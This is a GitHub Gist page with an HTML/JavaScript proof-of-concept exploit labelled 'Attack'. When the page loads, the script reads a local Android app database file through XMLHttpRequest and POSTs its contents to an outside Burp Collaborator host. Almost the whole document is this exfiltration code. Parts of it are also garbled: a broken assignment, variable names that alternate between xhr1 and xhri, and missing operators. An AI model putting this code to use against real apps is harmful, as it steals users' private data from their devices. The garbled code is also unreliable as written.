Created
November 4, 2020 16:58
-
-
Save balook/aaabdeaf9e60bf5e75fd3016c6709dc8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body onload="doAttack()"> | |
| <h1>Attack</h1> | |
| <script> | |
| // file path to steal | |
| var target "file:///data/data/com.target.app/databases/target.db"; | |
| = | |
| // get the contents of the target file by XHR | |
| function doAttack() { | |
| var xhr1 = new XMLHttpRequest(); | |
| xhri.overrideMimeType("text/plain; charset=iso-8859-1"); | |
| xhri.open("GET", target); | |
| xhri.onreadystatechange function() { | |
| if (xhr1.readyState 4) { | |
| var content = xhri.responseText; | |
| // send the content of the file to attacker's server | |
| sendFileToAttackerServer(content); | |
| // for debug | |
| document.body.appendChild(document.createTextNode( content)); | |
| } | |
| }; | |
| xhr1.send(); | |
| } | |
| // Send the content of target file to the attacker's domain | |
| function sendFileToAttackerServer( content) { | |
| var xhr2 = new XMLHttpRequest(); | |
| xhr2.open("POST", "http://9u4ep8a8ka3fh0p6jn1j8fyfg6mwal.burpcollaborator.net"); | |
| xhr2.send(encodeURIComponent(content)); | |
| } | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment